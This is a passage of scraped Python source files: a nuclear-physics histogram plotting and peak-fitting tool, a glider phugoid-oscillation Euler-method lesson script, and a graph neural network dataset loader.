117\n\n \"\"\"\n gatefile = open(filename, 'r')\n lineN = 0\n gates = {}\n for line in gatefile:\n lineN += 1\n line = line.strip()\n if line.startswith('#'):\n continue\n items = line.split()\n if len(items) < 5:\n print('Warning: line {} bad data'.format(lineN))\n continue\n gates[int(items[0])] = ((int(items[1]), int(items[2])),\n (int(items[3]), int(items[4])))\n return gates\n\n\n def pk(self, *args, **kwargs):\n \"\"\"Add peaks for gaussian fitting procedure. The args\n give a list of peak energy (approx.), the kwargs may include\n additional parameters (e.g. 
min or max, etc) used by peak_fitter\"\"\"\n for e in args:\n if isinstance(e, int) or isinstance(e, float):\n p = {'E' : e}\n p.update(kwargs)\n self.peaks.append(p)\n\n\n def pzot(self):\n \"\"\"Clear all peaks \"\"\"\n self.peaks=[]\n\n\n def dd(self, his, xc=None, yc=None, logz=None):\n \"\"\"Plot 2D histogram,\n\n his may be a positive integer (loads histogram from the data file)\n negative integer (2D plots registry) or Plot instance (must be a 2D\n plot)\n\n xc is x range, yc is y range, that may be applied immediately, \n see also xc() and yc() functions\n\n \"\"\"\n self.mode = 2\n\n for p in Experiment.maps:\n p.active = False\n\n plot = None\n self.plotter.clear()\n\n if isinstance(his, int):\n if his > 0:\n data = self.hisfile.load_histogram(his)\n if data[0] != 2:\n print('{} is not a 2D histogram'.format(his))\n return None\n\n title = self.hisfile.histograms[his]['title'].strip()\n title = '{}:{}'.format(his, \n self._replace_latex_chars(title))\n histo = histogram.Histogram(dim=2)\n histo.title = title\n histo.x_axis = data[1]\n histo.y_axis = data[2]\n histo.weights = data[3]\n plot = Plot(histo, 'map', True)\n Experiment.maps.append(plot)\n else:\n # plot histogram from the registry\n # Numbered by negative numbers (-1 being the latest)\n # Call show_registers for a list of available plots\n try:\n plot = Experiment.maps[his]\n Experiment.maps[his].active = True\n except IndexError:\n print('There is no 2D plot in the registry under the',\n 'number', his, 'use show_registry() to see',\n 'available plots')\n return None\n elif isinstance(his, Plot):\n # If instance of Plot class is given, mark it active and add\n # to the deque (if not already there)\n # and to the array to be returned at the end\n if his.histogram.dim != 2:\n print('This {} is not a 2D histogram'.format(his))\n return None\n his.active = True\n plot = his\n if his not in Experiment.maps:\n Experiment.maps.append(his)\n\n if xc is not None:\n Experiment.xlim2d = xc\n if yc is not None:\n Experiment.ylim2d = yc\n\n if logz is None:\n use_log = Experiment.logz\n else:\n use_log = logz\n if plot is not None:\n self.plotter.plot2d(plot, Experiment.xlim2d, \n Experiment.ylim2d, use_log)\n\n return [plot]\n\n\n def xc(self, x0=None, x1=None):\n \"\"\"Change xrange of a 2D histograms\"\"\"\n if self.mode == 2:\n if x0 is None or x1 is None:\n Experiment.xlim2d = None\n xlim = None\n for p in Experiment.maps:\n if p.active:\n histo = p.histogram\n xlim = (histo.x_axis[0], histo.x_axis[-1])\n break\n else:\n Experiment.xlim2d = (x0, x1)\n xlim = (x0, x1)\n self.dd(-1, xc=xlim, yc=Experiment.ylim2d)\n\n\n def yc(self, y0=None, y1=None):\n \"\"\"Change yrange of a 2D histogram\"\"\"\n if self.mode == 2:\n if y0 is None or y1 is None:\n Experiment.ylim2d = None\n ylim = None\n for p in Experiment.maps:\n if p.active:\n histo = p.histogram\n ylim = (histo.y_axis[0], histo.y_axis[-1])\n break\n else:\n Experiment.ylim2d = (y0, y1)\n ylim = (y0, y1)\n self.dd(-1, xc=Experiment.xlim2d, yc=ylim)\n\n\n\n def clear(self):\n self.plotter.clear()\n\n\n def color_map(self, cmap=None, clist=False):\n if self.mode == 2:\n self.plotter.color_map(cmap)\n self.dd(-1, xc=Experiment.xlim2d, yc=Experiment.ylim2d)\n if clist:\n maps=[m for m in cm.datad if not m.endswith(\"_r\")]\n print(maps)\n \n \n\n def fit_peaks(self, his=None, rx=None, clear=True):\n \"\"\"\n Fit gaussian peaks to 1D plot. If his is not given the\n current plot is used. 
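Peaks are taken from the list registered with pk(), e.g. e.pk(511) before e.fit_peaks(rx=(490, 530)) (values illustrative). 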
If rx is not given, the current range is used\n Returns list of lists:\n [E, x0, dx, A, dA, s, Area]\n where E is name of the peak, x0, A and s are fitted parameters\n and d'something' is its uncertainity. Area is total calculated area.\n\n \"\"\"\n if rx is None:\n rx = Experiment.xlim\n if len(rx) != 2:\n print('Please use x range in format rx=(min, max), where',\n 'min and max are integers.')\n return None\n\n # Deactivate all the plots\n for p in Experiment.plots:\n if p.active:\n p.active = False\n\n peaks = []\n for p in self.peaks:\n if rx[0] <= p.get('E') <= rx[1]:\n peaks.append(p)\n\n PF = PeakFitter(peaks, 'linear', '')\n\n\n if his is not None:\n if hasattr(his,'histogram'):\n x_axis = his.histogram.x_axis\n weights = his.histogram.weights\n title = his.histogram.title\n if isinstance(his, int):\n if his > 0:\n data = self.hisfile.load_histogram(his)\n if data[0] != 1:\n print('{} is not a 1D histogram'.format(his))\n return None\n x_axis = data[1]\n weights = data[3]\n title = self.hisfile.histograms[his]['title'].strip()\n title = '{}:{}'.format(his, self._replace_latex_chars(title))\n else:\n try:\n x_axis = Experiment.plots[his].histogram.x_axis\n weights = Experiment.plots[his].histogram.weights\n title = Experiment.plots[his].histogram.title\n except IndexError:\n x_axis=0\n weights=0\n title='Err'\n print('There is no plot in the registry under the',\n 'number', his, 'use show_registry() to see',\n 'available plots')\n return None\n else:\n x_axis = Experiment.plots[-1].histogram.x_axis\n weights = Experiment.plots[-1].histogram.weights\n title = Experiment.plots[-1].histogram.title\n \n dweights = self._standard_errors_array(weights)\n \n if clear:\n self.clear()\n\n histo_data = histogram.Histogram()\n histo_data.x_axis = x_axis\n histo_data.weights = weights\n histo_data.errors = dweights\n histo_data.title = title\n plot_data = Plot(histo_data, 'histogram', True)\n # The histogram data is plotted here so the fit function\n # may be overlaid on in. 
However, the plot_data is appended \n # to the registry after the fit functions so it is on top of the\n # registry.\n self.plotter.plot1d(plot_data, xlim=rx)\n\n fit_result = PF.fit(x_axis[rx[0]:rx[1]], weights[rx[0]:rx[1]],\n dweights[rx[0]:rx[1]])\n\n histo_baseline = histogram.Histogram()\n histo_baseline.x_axis = x_axis[rx[0]:rx[1]]\n histo_baseline.weights = fit_result['baseline']\n histo_baseline.title = 'Baseline'\n plot_baseline = Plot(histo_baseline, 'function', True)\n self.plotter.plot1d(plot_baseline, xlim=rx)\n\n histo_peaks = histogram.Histogram()\n histo_peaks.x_axis = fit_result['x_axis']\n histo_peaks.weights = fit_result['fit']\n histo_peaks.title = 'Fit'\n plot_peaks = Plot(histo_peaks, 'function', True)\n\n # Append all the plots to the registry, but\n # keep original data at the end, so the next fit_peaks()\n # call will use then again as default\n Experiment.plots.append(plot_baseline)\n Experiment.plots.append(plot_peaks)\n Experiment.plots.append(plot_data)\n\n # Plot the last one with the auto_scale if needed\n if Experiment.ylim is None:\n ylim = self._auto_scale_y()\n else:\n ylim = Experiment.ylim\n\n self.plotter.plot1d(plot_peaks, xlim=rx, ylim=ylim)\n\n\n\n print('#{:^8} {:^8} {:^8} {:^8} {:^8} {:^8} {:^8}'\n .format('Peak', 'x0', 'dx', 'A', 'dA', 's', 'Area'))\n peak_data = []\n for i, peak in enumerate(peaks):\n if peak.get('ignore') == 'True':\n continue\n x0 = PF.params['x{}'.format(i)].value\n dx = PF.params['x{}'.format(i)].stderr\n A = PF.params['A{}'.format(i)].value\n dA = PF.params['A{}'.format(i)].stderr\n s = PF.params['s{}'.format(i)].value\n Area = PF.find_area(x_axis, i)\n #.format functions differently for 3.4+. Now uses the object.__format__\n #if something doesn't have its own __format__. Avoided by making string w/ !s\n #had to remove '.(x)f' from all but first placeholder where (x)=decimal places\n #dvm 2018-05-09\n # to achieve the decimal formatting, currently using round(). 
Needs revisited\n # to evaluate accuracy of doing this to floats.\n print('{!s:>8} {!s:>8} {!s:>8} {!s:>8} {!s:>8} {!s:>8} {!s:>8}'\n .format(peaks[i].get('E'), round(x0,2), round(dx,2), round(A,2)\n , round(dA,2), round(s,2), round(Area,2)))\n peak_data.append([peaks[i].get('E'), x0, dx, A, dA, s, Area])\n return peak_data\n\n\n def fit_decay(self, his, gate, cycle, \n t_bin=1, time_range=None,\n model='grow_decay',\n pars=None,\n clear=True):\n \"\"\"Fits decay time profile (grow-in/decay cycle):\n * his: is E-time histogram id\n * gate: should be given in format:\n ((x0, x1), (bg0, bg1))\n * cycle: is list of beam start, beam stop, cycle end, e.g.\n (0, 100, 300)\n * t_bin: is a binning parameter (optional)\n * time_range: is a gate in time in (t0, t1) format (optional)\n * model: is a model used for fit (see decay_fitter)\n (default is 'grow_decay')\n * pars is a list of dictionaries (one dict per each parameter)\n (optional, use if model is different than the default one, see\n decay_fitter for details)\n \n \"\"\"\n if pars is None:\n T0 = {'name' : 'T0', 'value' : cycle[0], 'vary' : False}\n T1 = {'name' : 'T1', 'value' : cycle[1], 'vary' : False}\n T2 = {'name' : 'T2', 'value' : cycle[2], 'vary' : False}\n P1 = {'name' : 'P1', 'value' : 100.0}\n t1 = {'name' : 't1', 'value' : 100.0}\n parameters = [T0, T1, T2, P1, t1]\n if model == 'grow_decay2':\n P2 = {'name' : 'P2', 'value' : 1000.0}\n t2 = {'name' : 't2', 'value' : 1000.0}\n parameters.append(P2)\n parameters.append(t2)\n else:\n parameters = pars\n\n df = DecayFitter()\n\n xgate = self.gx(his, gate_x=gate[0], gate_y=time_range, bin_size=t_bin,\n plot=False)\n bckg = self.gx(his, gate_x=gate[1], gate_y=time_range, bin_size=t_bin,\n plot=False)\n\n dyg = self._standard_errors_array(xgate.histogram.weights)\n dyb = self._standard_errors_array(bckg.histogram.weights)\n\n gate_histo = histogram.Histogram()\n gate_histo.x_axis = xgate.histogram.x_axis\n gate_histo.weights = xgate.histogram.weights - bckg.histogram.weights\n gate_histo.errors = np.sqrt(dyg**2 + dyb**2)\n gate_histo.title = '{}: gx {} bg {} bin {}'.\\\n format(his, gate[0], gate[1], t_bin)\n plot_data = Plot(gate_histo, 'errorbar', True)\n\n t, n, parameters = df.fit(gate_histo.x_axis, gate_histo.weights,\n gate_histo.errors, model, parameters)\n\n fit_histo = histogram.Histogram()\n fit_histo.x_axis = t\n fit_histo.weights = n\n fit_histo.title = self._replace_latex_chars('Fit: {}'.format(model))\n plot_fit = Plot(fit_histo, 'function', True)\n\n if clear:\n self.clear()\n\n self.plotter.plot1d(plot_fit, [cycle[0], cycle[2]], None)\n self.plotter.plot1d(plot_data, [cycle[0], cycle[2]], None)\n\n Experiment.plots.append(plot_fit)\n Experiment.plots.append(plot_data)\n\n return parameters\n\n\n def gamma_gamma_spectra(self, gg_id, gate, bin_size=1):\n \"\"\" \n Plots gamma-gamma gate broken into 4 subplots (0-600, 600-1200,\n 1200-2000, 2000-4000. \n gg_id is a 2D histogram id\n gate is in form ((x1, y1), (x2, y2)) where i=1 is gate on line, i=2\n is gate on background\n\n This special plot is not loaded into the registry in a 4 panel\n form, but as a 'standard' plot object\n \"\"\"\n self.clear()\n plot = self.gy(gg_id, gate[0], bg_gate=gate[1], \n bin_size=bin_size, plot=False )\n ranges = (0, 600, 1200, 2000, 4000)\n self.plotter.plot1d_4panel(plot, ranges)\n\n def st(self,numx,numy,args):\n \"\"\"\n This command is similar but different to the \"st\" or stack\n command in damm. 
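It expects exactly numx*numy plots, e.g. e.st(2, 2, [p1, p2, p3, p4]) (plot names assumed). 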
Create an array of subplots numx by numy.\n Then disply a multiplot array of list *args). This should work for \n 1 and 2d histograms but ought to be cleaned up.\n \"\"\"\n\n self.clear()\n for i in range(numx):\n for j in range(numy):\n if len(args)!=numx*numy: \n print('range mismatch')\n break\n n = i+numx*(j-1) if numy!=1 else j+numy*(i-1) \n ax = plt.subplot(numx,numy,n)\n ax.set_xlim([args[n].histogram.weights.nonzero()[0][0]-2,args[n].histogram.weights.nonzero()[0][-1]+10])\n ax.set_ylim([0,args[n].histogram.weights.max()*1.66])\n if args[n].histogram.dim==1: \n ax.plot(args[n].histogram.weights,ls='steps-mid',label=args[n].histogram.title)\n ax.legend()\n else:\n self.plotter.plot2d(args[n])\n plt.tight_layout()\n\n\n def rebin(self,hisd):\n \"\"\"\n Rebin the last 1 or 2d histogram as specified by hisd. Can be used after a \"zoom\" or \"pan\" in the canvas. TBD automated rebinning for faster displaying.\n \"\"\"\n tup = (plt.xlim(),plt.ylim())\n if hisd==1:\n temp=self.plots[-1]\n tup=self.fence(temp,tup,hisd)\n self.dl(tup[0][0],tup[0][1])\n else:\n temp=self.maps[-1]\n tup=self.fence(temp,tup,hisd)\n self.dd(-1,xc=tup[0],yc=tup[1])\n\n\n def fence(self,args,tup,hisd):\n \"\"\"\n Confine plot regions to the bounds of the data in the histogram.\n \"\"\"\n x0 = tup[0][0]\n x1 = tup[0][1]\n y0 = tup[1][0]\n y1 = tup[1][1]\n if x0 <= args.histogram.x_axis[0]:\n x0 = args.histogram.x_axis[0]\n if x1 >= args.histogram.x_axis[-1]:\n x1 = args.histogram.x_axis[-1]\n if y0 <= 0:\n y0 = 0\n if hisd==1:\n if y1 >= args.histogram.weights.max():\n y1 = args.histogram.weights.max()*1.33\n else:\n if y1 >= args.histogram.y_axis[-1]:\n y1 = args.histogram.y_axis[-1]\n return ((x0,x1),(y0,y1)) \n\n def trace_explorer(self,his,start=0,finish=None):\n \"\"\"\n Adds the ability to examine a 2D trace histogram or range of 1D histograms \n and use sliders to visualize the effect of a given trapezoidal filter on the traces.\n This is most helpful when setting up a new detector or signal type. 
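A typical call (histogram id assumed) is e.trace_explorer(900, start=0, finish=50); the Length, Gap, Trace id and Tau sliders then update the filtered trace live.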
\n \"\"\"\n\n import matplotlib.patches as mpt\n from matplotlib.widgets import Slider, Button, RadioButtons\n\n fig = plt.figure()\n\n def trap_filter(times,res,L,G):\n \"\"\"\n Returns the trapezoidal filtered version of the input vector, res according to \n L (length) and G (gap) of the resultant trapezoid.\n \"\"\"\n retvec = np.zeros(len(times))\n zidx = times.searchsorted(0)\n for i in range( zidx,len(times) ):\n retvec[i]=(res[i-L+1:i]-res[i-2*L-G+1:i-L-G]).sum()\n return(retvec)\n\n def tau_adjust(pulse,tau):\n \"\"\"\n Returns the Tau/Pole-Zero corrected version of the input vector, pulse according to tau.\n \"\"\"\n from copy import deepcopy as cp\n\n bls = cp(pulse)\n retvec = cp(pulse)\n bls -= pulse[:100].mean()\n for t in range(3,len(pulse)):\n pz = bls[:t-1].sum()\n retvec[t] += bls[t] + pz/tau \n return(retvec)\n\n def zero_crossing(trap):\n \"\"\"\n Returns the CFD version of the input vector, trap.\n \"\"\"\n from copy import deepcopy as cp\n\n delay = cp(trap)\n td = 20 #time delay \n cf = .8 #constant fraction\n delay[:-td] += -cf*trap[td:] \n return(delay)\n\n def update_te(val):\n slen.val = int(slen.val)\n length = slen.val\n slen.valtext.set_text(length)\n sgap.val = int(sgap.val)\n gap = sgap.val\n sgap.valtext.set_text(gap)\n sid.val = int(sid.val)\n trace_id = sid.val\n sid.valtext.set_text(trace_id)\n tau = 10**stau.val\n stau.valtext.set_text(tau)\n \n pulse[pulse_len:] =weights[:,trace_id][:pulse_len]\n pulse[:pulse_len] =weights[:,trace_id][2]\n pz = tau_adjust(pulse, tau)\n ff = trap_filter(t,pz,length,gap)\n zc = zero_crossing(ff)\n l.set_ydata( pulse )\n l2.set_ydata( pz )\n l3.set_ydata( ff )\n l4.set_ydata( zc )\n ax1.set_ylim(pulse.min()-margin,pulse.max()+margin)\n ax2.set_ylim(pz.min()-margin,pz.max()+margin)\n ax3.set_ylim(ff.min()-margin,ff.max()+margin)\n ax4.set_ylim(zc.min()-margin,zc.max()+margin)\n fig.canvas.draw_idle()\n \n #starting positions for sliders\n l0=100\n g0=200\n tau=1\n \n histo = self.hisfile.load_histogram(his)\n weights = histo[3]\n dim = histo[0]\n\n if finish==None and dim == 2:\n finish = weights[10].nonzero()[0][-1]\n elif finish==None:\n finish = start + 1 \n\n if dim == 2:\n pulse_histo = weights[:,start]\n else:\n pulse_histo = weights \n pulse_len = pulse_histo.nonzero()[0][-1]+1\n\n pulse = np.zeros(2*pulse_len)\n pulse[pulse_len:] += pulse_histo[:pulse_len]\n pulse[:pulse_len] += pulse_histo[2]\n t = np.arange(-pulse_len,pulse_len,1) \n\n ax1 = plt.subplot(3,2,1)\n ax2 = plt.subplot(3,2,2,sharex=ax1)\n ax3 = plt.subplot(3,2,3,sharex=ax1)\n ax4 = plt.subplot(3,2,4,sharex=ax1)\n margin = 100\n \n pz = tau_adjust(pulse,tau)\n ff = trap_filter(t,pz,l0,g0)\n zc = zero_crossing(ff)\n \n l,= ax1.plot(t,pulse,lw=2,color='red')\n ax1.legend(['Input Pulse'])\n l2,= ax2.plot(t,pz,lw=2,color='k')\n ax2.legend(['Pole-zero/Tau Corrected'])\n l3,= ax3.plot(t,ff,lw=2,color='blue')\n ax3.legend(['Trapezoidal Filter Output'])\n l4,= ax4.plot(t,zc,lw=2,color='green')\n ax4.legend(['CFD Output'])\n \n ax2.set_xlim(0,pulse_len)\n ax1.set_ylim(pulse.min()-margin,pulse.max()+margin)\n ax2.set_ylim(pz.min()-margin*10,pz.max()+margin*10)\n ax3.set_ylim(ff.min()-margin*10,ff.max()+margin*10)\n ax4.set_ylim(zc.min()-margin*10,zc.max()+margin*10)\n \n axlen = plt.axes([0.15,0.17, 0.65, 0.03])\n axgap = plt.axes([0.15,0.21, 0.65, 0.03])\n axid = plt.axes([0.15,0.13, 0.65, 0.03])\n axtau = plt.axes([0.15,0.09, 0.65, 0.03])\n slen = Slider(axlen, 'Length', 1, 1000.0, valinit=l0)\n sgap = Slider(axgap, 'Gap', 1, 1000.0, valinit=g0)\n sid = 
Slider(axid, 'Trace id', start, finish, valinit=start)\n stau = Slider(axtau, 'Tau', -1, 4, valinit=tau)\n\n\n slen.on_changed(update_te)\n sgap.on_changed(update_te)\n sid.on_changed(update_te)\n stau.on_changed(update_te)\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"pydamm.py","file_name":"pydamm.py","file_ext":"py","file_size_in_byte":52655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"549160373","text":"import numpy as np\nfrom math import sin, cos, log, ceil\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams #Allows us to set notebook wide plotting parameters\n\nrcParams['font.family'] = 'serif'\nrcParams['font.size'] = 16\n\n \n#Impliments a single step in the Euler method: u(t + dt) = u(t) + dt*u_prime(u(t)) \ndef Euler_Step (u, u_prime, dt):\n \n return u + dt*u_prime(u)\n \n#Computes the difference between two solutions, one on the current grid and the other\n#on a finer grid\n\ndef get_griddiff(u_current,u_fine,dt):\n space_current = len(u_current[:,0])\n space_fine = len(u_fine[:,0])\n \n grid_ratio = ceil(space_fine/float(space_current))\n \n diffgridx = dt*np.sum(np.abs(u_current[:,2] - u_fine[::grid_ratio,2]))\n diffgridy = dt*np.sum(np.abs(u_current[:,3] - u_fine[::grid_ratio,3]))\n \n return max(diffgridx,diffgridx)\n\n\n#Define the parameters for the model\ng = 9.81 #acceleration due to gravity\nv_t = 60. #trim velocity \nC_D = 1/40. #Drag coefficeint --- or D/L if C_L = 1.0\nC_L = 1 #For convenience we put C_L = 1 \n\n\n#Initial Conditions\nv0 = v_t #Start at the trim velocity\ntheta0 = 0.0 #Initially horizonatl\nx0 = 0.0 #Horizontal position -- arbitrary\ny0 = 1000.0 #Initial altitude\n\n\n#Define u_prime for this model\ndef f_phugoid(u):\n #u is a four array u= (v,theta,x,y)\n \n v = u[0]\n theta = u[1]\n x = u[2]\n y=u[3]\n \n return np.array([-g*sin(theta) - C_D/C_L*g/v_t**2*v**2, -g/v*cos(theta)\n +g/v_t**2*v, v*cos(theta), v*sin(theta)])\n \n\n\n#Choose the flight time\nT = 100.\n\n#We would like to test this model for several values of the time step dt\n\n#dt_values = np.array([0.1,0.05,0.01,0.005,0.001])\ndt_values = np.array(range(0,6))*0.2*np.pi\ndt = 0.01\n#Will hold the solutions one for each value of dt\nu_values = np.empty_like(dt_values, dtype = np.ndarray)\n\n#Perform Eulers method for each dt\n\nfor i,vin in enumerate(dt_values):\n \n N = int(T/dt) + 1 #Number of time steps\n \n #Initilize array to hold the soltuion and then put first element equal to the initial conditions\n u = np.empty((N,4))\n u[0] = np.array([v0,vin,x0,y0])\n \n #Run Eulers method\n for j in range (N-1):\n u[j+1] = Euler_Step(u[j],f_phugoid,dt)\n \n #Store solution is u_vales\n u_values[i] = u \n'''\n#Make an array of grid differences\ngriddiff = np.empty_like(dt_values)\n\nfor i, dt in enumerate(dt_values):\n \n print ('dt = {}'.format(dt))\n #Find grid differences between a given grid and the finest one we computed\n \n griddiff[i] = get_griddiff(u_values[i],u_values[-1],dt)\n\n'''\n#We are now ready to plot the trajectories\n\nplt.figure(figsize=(8,6))\nplt.grid(True)\nplt.xlabel(r'x',fontsize = 18)\nplt.ylabel(r'y', fontsize = 18)\nplt.title('Glider Trajectory: Flight Time = %.2f'% T, fontsize =18)\n\nfor i in range(len(dt_values)):\n plt.plot(u_values[i][:,2],u_values[i][:,3], lw = 2, label = '%.2f'%dt_values[i])\nplt.legend()\n'''\n#Plot the grid differences on log-log scale\nplt.figure(figsize = (6,6))\nplt.grid(True)\nplt.xlabel(r'$\\Delta t$',fontsize = 18)\nplt.ylabel(r'$L_1$--norm of grid 
difference', fontsize = 18)\nplt.axis('equal')\nplt.loglog(dt_values[:-1],griddiff[:-1],color ='r', ls = '-', lw=2,marker = 'o')\n\n'''\nplt.show()\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"lessons/01_phugoid/My Files/Phugoid_Oscillation.py","file_name":"Phugoid_Oscillation.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"91816905","text":"from torch.autograd import Variable\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom sklearn.decomposition import PCA\n\ntorch.manual_seed(123)\nfrom dgl.data import CoraDataset, CitationGraphDataset, PPIDataset, KarateClub\nimport dgl\nfrom scipy import sparse\nimport numpy as np\nnp.random.seed(123)\nimport time\nimport networkx as nx\nfrom .pytorch_U2GNN_UnSup import TransformerU2GNN\nfrom .gat_pytorch import TransformerGAT\nfrom .gcn_pytorch import TransformerGCN\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nfrom .metrics import print_evaluation_from_embeddings\nfrom scipy.sparse import coo_matrix\nfrom .data_utils import generate_synthetic_dataset, get_vicker_chan_dataset, get_congress_dataset, get_mammo_dataset, get_balance_dataset, get_leskovec_dataset, get_leskovec_true_dataset, sgwt_raw_laplacian, load_ml_clustering_mat_dataset, load_ml_clustering_scipymat_dataset, get_uci_true_dataset\nfrom .util import load_data, separate_data_idx, Namespace ,make_symmetric\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import kneighbors_graph\nimport statistics\nfrom .python_multi_layer_siamese_u2gnn import TransformerMLU2GNN\n\ndef process_adj_mat(adj,args):\n \n pos_weight = float(adj.shape[0] * adj.shape[1] * adj.shape[2] - adj.sum()) / adj.sum()\n norm = adj.shape[0] * adj.shape[1] * adj.shape[2] / float((adj.shape[0] * adj.shape[1] * adj.shape[2] - adj.sum()) * 2)\n adj_label = adj.copy()\n #adj_label = Variable(torch.from_numpy(adj_label).float().to(args.device))\n adj_label = torch.from_numpy(adj_label).float().to(args.device)\n #adj_norm = Variable(torch.from_numpy(nx.normalized_laplacian_matrix(args.graph_obj).todense()).float().to(args.device))\n adj_norm = Variable(torch.from_numpy(adj.copy()).float().to(args.device))\n args.update(adj_norm = adj_norm)\n weight_mask = adj_label.view(-1) == 1\n weight_tensor = torch.ones(weight_mask.size(0)).to(args.device)\n weight_tensor[weight_mask] = pos_weight\n args.update(adj_label = adj_label)\n args.update(norm = torch.tensor(norm))\n args.update(weight_tensor = weight_tensor)\n \n\ndef get_input_generator(args):\n # load and preprocess dataset\n if args.dataset == 'cora':\n data = CoraDataset()\n elif args.dataset == 'citeseer':\n data = CitationGraphDataset('citeseer')\n elif args.dataset == 'pubmed':\n data = CitationGraphDataset('pubmed')\n elif args.dataset == 'PPIDataset':\n data = PPIDataset()\n elif args.dataset == \"karate\":\n data = KarateClub()\n g = data[0]\n g.ndata['feat'] = torch.eye(g.number_of_nodes()).to(args.device)\n g.ndata['train_mask'] = torch.from_numpy(np.ones((g.number_of_nodes(),), dtype=bool)).to(args.device)\n g.ndata['val_mask'] = torch.from_numpy(np.ones((g.number_of_nodes(),), dtype=bool)).to(args.device)\n g.ndata['test_mask'] = torch.from_numpy(np.ones((g.number_of_nodes(),), dtype=bool)).to(args.device)\n elif args.dataset == \"synth\":\n \n output = generate_synthetic_dataset(size_x = args.size_x, graph_type =args.synth_graph_type, ng_path = 
args.ng_data)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"vicker\":\n output = get_vicker_chan_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"congress\":\n output = get_congress_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"mammo\":\n output = get_mammo_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"balance\":\n output = get_balance_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"leskovec\":\n output = get_leskovec_true_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"webKB_texas_2\":\n output = load_ml_clustering_mat_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset in [\"3sources\", \"BBCSport2view_544\" , \"BBC4view_685\" , \"WikipediaArticles\"]:\n output = load_ml_clustering_scipymat_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"UCI\":\n output = get_uci_true_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n else:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n\n g = data[0]\n if args.device == 'cuda':\n cuda = False\n else:\n cuda = True\n #g = g.to(args.device)\n \n features = g.ndata['feat']#.unsqueeze( axis = -1)\n labels = g.ndata['label']\n train_mask = g.ndata['train_mask']\n print(sum(train_mask))\n val_mask = g.ndata['val_mask'].type(torch.BoolTensor)\n test_mask = g.ndata['test_mask'].type(torch.BoolTensor)\n if(not (args.dataset == \"karate\")):\n train_mask = ~ (val_mask | test_mask)\n print(sum(train_mask))\n num_feats = features.shape[1]\n n_edges = g.number_of_edges()\n print(\"\"\"----Data statistics------'\n #Edges %d\n #Train samples %d\n #Val samples %d\n #Test samples %d\"\"\" %\n (n_edges,\n train_mask.int().sum().item(),\n val_mask.int().sum().item(),\n test_mask.int().sum().item()))\n\n # remove self loop\n #g = dgl.remove_self_loop(g)\n n_edges = g.number_of_edges()\n nx_g = data[0].to_networkx()\n adj = np.array(nx.convert_matrix.to_numpy_matrix(nx_g))\n adj = make_symmetric(adj)\n adj_list = [adj]\n graphs_list = [nx_g]\n Ls = [sgwt_raw_laplacian(adj)]\n features = torch.tensor(PCA(n_components=args.size_x).fit_transform(g.ndata['feat'].numpy()),dtype=torch.float).to(args.device)\n features_list = [features]\n if(args.create_similarity_layer):\n adj_2 = np.array(kneighbors_graph(g.ndata['feat'].numpy(),n_neighbors = args.num_similarity_neighbors, metric = \"cosine\",include_self = True).todense())\n adj_2 = make_symmetric(adj_2)\n nx_g2 = nx.convert_matrix.from_numpy_array(adj_2, create_using = nx.DiGraph)\n adj_list.append(adj_2)\n graphs_list.append(nx_g2)\n features_list.append(features)\n 
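# the second adjacency layer is a symmetric cosine kNN similarity graph built from the raw node features\n            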
Ls.append(sgwt_raw_laplacian(adj_2))\n\n\n adj_final = np.stack(adj_list,axis = 2)\n L = np.stack(Ls, axis = 2)\n features = torch.stack(features_list, axis = 2 )\n process_adj_mat(adj_final, args)\n args.update(graph_obj =graphs_list)\n args.update(laplacian=L)\n return graphs_list, features, labels, train_mask, val_mask, test_mask\n\ndef sample_neighbors(graph, args):\n \n input_neighbors = []\n for val in range(args.vocab_size):\n value = val\n neighbors_list = [n for n in graph.neighbors(value)]\n if(neighbors_list):\n input_neighbors.append([value]+list(np.random.choice(neighbors_list, args.num_neighbors, replace=True)))\n else:\n input_neighbors.append([value for _ in range(args.num_neighbors + 1)])\n return input_neighbors\n\ndef get_batch_data_node(graphs, features, train_idx, args):\n '''\n returns:\n X_concat: concatenated features of all the selected graphs\n input_x: neighbor matrix #num_nodes X # num neighbours + 1 \n input_y: 1D Tensor of where the nodes of selected_graph are, in the sparse graph matrix.\n '''\n #X_concat = features[train_idx].to(args.device)\n input_neighbors_per_graph = []\n for graph in graphs:\n input_neighbors_per_graph.append(sample_neighbors(graph,args))\n\n input_x = np.array(input_neighbors_per_graph)\n input_x = torch.from_numpy(input_x).permute(1,2,0).to(args.device)\n input_y = torch.from_numpy(np.array([x for x in range(args.vocab_size)])).to(args.device)\n return features.to(args.device), input_x, input_y\n\n\nclass Batch_Loader_node_classification(object):\n def __init__(self,args):\n init_object = get_input_generator(args)\n self.graph = init_object[0]\n self.graph, self.features, self.label, self.train_mask, self.val_mask, 